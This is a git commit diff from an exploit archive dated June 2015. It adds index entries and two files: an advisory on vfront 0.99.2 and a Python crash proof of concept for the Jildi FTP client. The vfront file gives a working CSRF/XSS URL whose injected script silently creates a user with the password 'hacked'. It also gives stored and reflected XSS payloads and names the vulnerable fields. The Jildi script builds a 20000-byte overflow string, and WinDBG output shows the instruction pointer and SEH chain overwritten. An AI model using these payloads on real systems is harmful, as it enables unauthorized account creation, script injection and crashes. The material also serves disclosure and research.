DB: 2015-06-04
2 new exploits
This commit is contained in:
parent
222fb2102d
commit
0e74581282
3 changed files with 193 additions and 0 deletions
|
@ -33375,6 +33375,7 @@ id,file,description,date,author,platform,type,port
|
||||||
36980,platforms/windows/local/36980.py,"VideoCharge Express 3.16.3.04 - BOF Exploit",2015-05-11,evil_comrade,windows,local,0
|
36980,platforms/windows/local/36980.py,"VideoCharge Express 3.16.3.04 - BOF Exploit",2015-05-11,evil_comrade,windows,local,0
|
||||||
36981,platforms/windows/local/36981.py,"VideoCharge Professional + Express Vanilla 3.18.4.04 - BOF Exploit",2015-05-11,evil_comrade,windows,local,0
|
36981,platforms/windows/local/36981.py,"VideoCharge Professional + Express Vanilla 3.18.4.04 - BOF Exploit",2015-05-11,evil_comrade,windows,local,0
|
||||||
36982,platforms/windows/local/36982.py,"VideoCharge Vanilla 3.16.4.06 - BOF Exploit",2015-05-11,evil_comrade,windows,local,0
|
36982,platforms/windows/local/36982.py,"VideoCharge Vanilla 3.16.4.06 - BOF Exploit",2015-05-11,evil_comrade,windows,local,0
|
||||||
|
37186,platforms/php/webapps/37186.txt,"vfront-0.99.2 CSRF & Persistent XSS",2015-06-03,"John Page",php,webapps,0
|
||||||
36984,platforms/windows/remote/36984.py,"i.FTP 2.21 - Time Field SEH Exploit",2015-05-11,"Revin Hadi Saputra",windows,remote,0
|
36984,platforms/windows/remote/36984.py,"i.FTP 2.21 - Time Field SEH Exploit",2015-05-11,"Revin Hadi Saputra",windows,remote,0
|
||||||
37006,platforms/java/webapps/37006.txt,"Minify 2.1.x 'g' Parameter Cross Site Scripting Vulnerability",2012-03-21,"Ayoub Aboukir",java,webapps,0
|
37006,platforms/java/webapps/37006.txt,"Minify 2.1.x 'g' Parameter Cross Site Scripting Vulnerability",2012-03-21,"Ayoub Aboukir",java,webapps,0
|
||||||
36986,platforms/php/webapps/36986.txt,"Pluck 4.7 - Directory Traversal",2015-05-11,"Wad Deek",php,webapps,0
|
36986,platforms/php/webapps/36986.txt,"Pluck 4.7 - Directory Traversal",2015-05-11,"Wad Deek",php,webapps,0
|
||||||
|
@ -33563,3 +33564,4 @@ id,file,description,date,author,platform,type,port
|
||||||
37180,platforms/php/webapps/37180.txt,"WordPress Newsletter Manager Plugin 1.0 Multiple Cross Site Scripting Vulnerabilities",2012-05-15,"Heine Pedersen",php,webapps,0
|
37180,platforms/php/webapps/37180.txt,"WordPress Newsletter Manager Plugin 1.0 Multiple Cross Site Scripting Vulnerabilities",2012-05-15,"Heine Pedersen",php,webapps,0
|
||||||
37182,platforms/php/webapps/37182.txt,"WordPress LeagueManager 3.9.11 Plugin - SQLi",2015-06-02,javabudd,php,webapps,0
|
37182,platforms/php/webapps/37182.txt,"WordPress LeagueManager 3.9.11 Plugin - SQLi",2015-06-02,javabudd,php,webapps,0
|
||||||
37183,platforms/linux/local/37183.c,"PonyOS <= 3.0 - tty ioctl() Local Kernel Exploit",2015-06-02,"Hacker Fantastic",linux,local,0
|
37183,platforms/linux/local/37183.c,"PonyOS <= 3.0 - tty ioctl() Local Kernel Exploit",2015-06-02,"Hacker Fantastic",linux,local,0
|
||||||
|
37187,platforms/windows/dos/37187.py,"Jildi FTP Client Buffer Overflow PoC",2015-06-03,metacom,windows,dos,21
|
||||||
|
|
Can't render this file because it is too large.
|
131
platforms/php/webapps/37186.txt
Executable file
131
platforms/php/webapps/37186.txt
Executable file
|
@ -0,0 +1,131 @@
|
||||||
|
# Exploit Title: CSRF & Persistent XSS
|
||||||
|
# Google Dork: intitle: CSRF & Persistent XSS
|
||||||
|
# Date: 2015-06-02
|
||||||
|
# Exploit Author: John Page (hyp3rlinx)
|
||||||
|
# Website: hyp3rlinx.altervista.org/
|
||||||
|
# Vendor Homepage: www.vfront.org
|
||||||
|
# Software Link: www.vfront.org
|
||||||
|
# Version: 0.99.2
|
||||||
|
# Tested on: windows 7
|
||||||
|
# Category: webapps
|
||||||
|
|
||||||
|
|
||||||
|
Product:
|
||||||
|
===================================================================================
|
||||||
|
vfront-0.99.2 is a PHP web based MySQL & PostgreSQL database management application.
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
Advisory Information:
|
||||||
|
====================================
|
||||||
|
CSRF, Persistent XSS & reflected XSS
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
Vulnerability Detail(s):
|
||||||
|
=======================
|
||||||
|
|
||||||
|
|
||||||
|
CSRF:
|
||||||
|
=========
|
||||||
|
No CSRF token in place, therefore we can add arbitrary users to the system.
|
||||||
|
|
||||||
|
|
||||||
|
Persistent XSS:
|
||||||
|
================
|
||||||
|
variabili.php has multiple XSS vectors using POST method, one input field 'altezza_iframe_tabella_gid' will store XSS payload
|
||||||
|
into the MySQL database which will be run each time variabili.php is accessed from victims browser.
|
||||||
|
|
||||||
|
|
||||||
|
Persisted XSS stored in MySQL DB:
|
||||||
|
=================================
|
||||||
|
DB-----> vfront_vfront
|
||||||
|
TABLE-----> variabili
|
||||||
|
COLUMN------> valore (will contain our XSS)
|
||||||
|
|
||||||
|
|
||||||
|
Exploit code(s):
|
||||||
|
===============
|
||||||
|
|
||||||
|
|
||||||
|
CSRF code add arbitrary users to system:
|
||||||
|
=======================================
|
||||||
|
http://localhost/vfront-0.99.2/vfront-0.99.2/admin/log.php?op="/><script>var xhr%3dnew XMLHttpRequest();xhr.onreadystatechange%3dfunction(){if(xhr.status%3d%3d200){if(xhr.readyState%3d%3d4){alert(xhr.responseText);}}};xhr.open('POST','utenze.db.php?insert_new',true);xhr.setRequestHeader('Content-type','application/x-www-form-urlencoded');xhr.send('nome%3dhyp3rlinxe%26cognome%3dapparitionsec%26email%3dx@x.com%26passwd%3dhacked%26passwd1%3dhacked');</script>&tabella=&uid=&data_dal=All&data_al=All
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
Persistent XSS:
|
||||||
|
================
|
||||||
|
http://localhost/vfront-0.99.2/vfront-0.99.2/admin/variabili.php?feed=0&gidfocus=0
|
||||||
|
Inject XSS into 'the altezza_iframe_tabella_gid' input field to store in database.
|
||||||
|
"/><script>alert(666)</script>
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
Reflected XSS(s):
|
||||||
|
=================
|
||||||
|
http://localhost/vfront-0.99.2/vfront-0.99.2/admin/query_editor.php?id=&id_table=&id_campo="/><script>alert(666)</script>
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
XSS vulnerable input fields:
|
||||||
|
============================
|
||||||
|
http://localhost/vfront-0.99.2/vfront-0.99.2/admin/variabili.php
|
||||||
|
altezza_iframe_tabella_gid <------------- ( Persistent XSS )
|
||||||
|
passo_avanzamento_veloce_gid
|
||||||
|
n_record_tabella_gid
|
||||||
|
search_limit_results_gid
|
||||||
|
max_tempo_edit_gid
|
||||||
|
home_redirect_gid
|
||||||
|
formati_attach_gid
|
||||||
|
default_group_ext_gid
|
||||||
|
cron_days_min_gid
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
Disclosure Timeline:
|
||||||
|
===================================
|
||||||
|
|
||||||
|
|
||||||
|
Vendor Notification: May 31, 2015
|
||||||
|
June 2, 2015 : Public Disclosure
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
Severity Level:
|
||||||
|
===================================
|
||||||
|
High
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
Description:
|
||||||
|
==========================================================
|
||||||
|
|
||||||
|
Request Method(s):
|
||||||
|
[+] GET & POST
|
||||||
|
|
||||||
|
Vulnerable Product:
|
||||||
|
[+] vfront-0.99.2
|
||||||
|
|
||||||
|
Vulnerable Parameter(s):
|
||||||
|
[+] altezza_iframe_tabella_gid
|
||||||
|
passo_avanzamento_veloce_gid
|
||||||
|
n_record_tabella_gid
|
||||||
|
search_limit_results_gid
|
||||||
|
max_tempo_edit_gid
|
||||||
|
home_redirect_gid
|
||||||
|
formati_attach_gid
|
||||||
|
default_group_ext_gid
|
||||||
|
cron_days_min_gid
|
||||||
|
id_campo
|
||||||
|
op
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
Affected Area(s): [+] Admin & MySQL DB
|
||||||
|
|
||||||
|
===============================================================
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
(hyp3rlinx)
|
60
platforms/windows/dos/37187.py
Executable file
60
platforms/windows/dos/37187.py
Executable file
|
@ -0,0 +1,60 @@
|
||||||
|
#!/usr/bin/python
|
||||||
|
#Exploit Title:Jildi FTP Client Buffer Overflow Poc
|
||||||
|
#Version:1.5.2 Build 1138
|
||||||
|
#Homepage:http://de.download.cnet.com/Jildi-FTP-Client/3000-2160_4-10562942.html
|
||||||
|
#Software Link:http://de.download.cnet.com/Jildi-FTP-Client/3001-2160_4-10562942.html?hasJs=n&hlndr=1&dlm=0
|
||||||
|
#Tested on:Win7 32bit EN-Ultimate
|
||||||
|
#Date found: 02.06.2015
|
||||||
|
#Date published: 02.06.2015
|
||||||
|
#Author:metacom
|
||||||
|
|
||||||
|
'''
|
||||||
|
===========
|
||||||
|
Description:
|
||||||
|
===========
|
||||||
|
JilidFTP is a powerful ftp-client program for Windows, it fast and reliable
|
||||||
|
and with lots of useful features. It supports multi-thread file upload or
|
||||||
|
download , so you can upload or download several files at the same time.
|
||||||
|
The job manager integrates with the Windows scheduler engine ,this provide
|
||||||
|
you more freedom and flexibility to upload or download your files.
|
||||||
|
It can also traces changes within a local directory and apply these
|
||||||
|
changes to remote ftp server .The user-friendly interface lets your
|
||||||
|
software distribution, uploading files to a web-server, and providing
|
||||||
|
archives for various purposes more easily.
|
||||||
|
|
||||||
|
============
|
||||||
|
How to Crash:
|
||||||
|
============
|
||||||
|
Copy the AAAA...string from Jildi_FTP.txt to clipboard, open Jildi Ftp and press Connect
|
||||||
|
and paste it in the Option -- Name or Address --and press connect.
|
||||||
|
|
||||||
|
===============================================
|
||||||
|
Crash Analysis using WinDBG: Option --> Address
|
||||||
|
===============================================
|
||||||
|
(f6c.4fc): Access violation - code c0000005 (!!! second chance !!!)
|
||||||
|
eax=00000000 ebx=00000000 ecx=41414141 edx=7790660d esi=00000000 edi=00000000
|
||||||
|
eip=41414141 esp=000311cc ebp=000311ec iopl=0 nv up ei pl zr na pe nc
|
||||||
|
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010246
|
||||||
|
41414141 ??
|
||||||
|
0:000> !exchain
|
||||||
|
0012ef40: 41414141
|
||||||
|
Invalid exception stack at 41414141
|
||||||
|
|
||||||
|
============================================
|
||||||
|
Crash Analysis using WinDBG: Option --> Name
|
||||||
|
============================================
|
||||||
|
(2ec.dac): Access violation - code c0000005 (!!! second chance !!!)
|
||||||
|
eax=00000000 ebx=00000000 ecx=41414141 edx=7790660d esi=00000000 edi=00000000
|
||||||
|
eip=41414141 esp=000311cc ebp=000311ec iopl=0 nv up ei pl zr na pe nc
|
||||||
|
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010246
|
||||||
|
41414141 ?? ???
|
||||||
|
0:000> !exchain
|
||||||
|
0012ef40: 41414141
|
||||||
|
Invalid exception stack at 41414141
|
||||||
|
'''
|
||||||
|
filename="Jildi_FTP.txt"
|
||||||
|
junk1="\x41" * 20000
|
||||||
|
buffer=junk1
|
||||||
|
textfile = open(filename , 'w')
|
||||||
|
textfile.write(buffer)
|
||||||
|
textfile.close()
|
Loading…
Add table
Reference in a new issue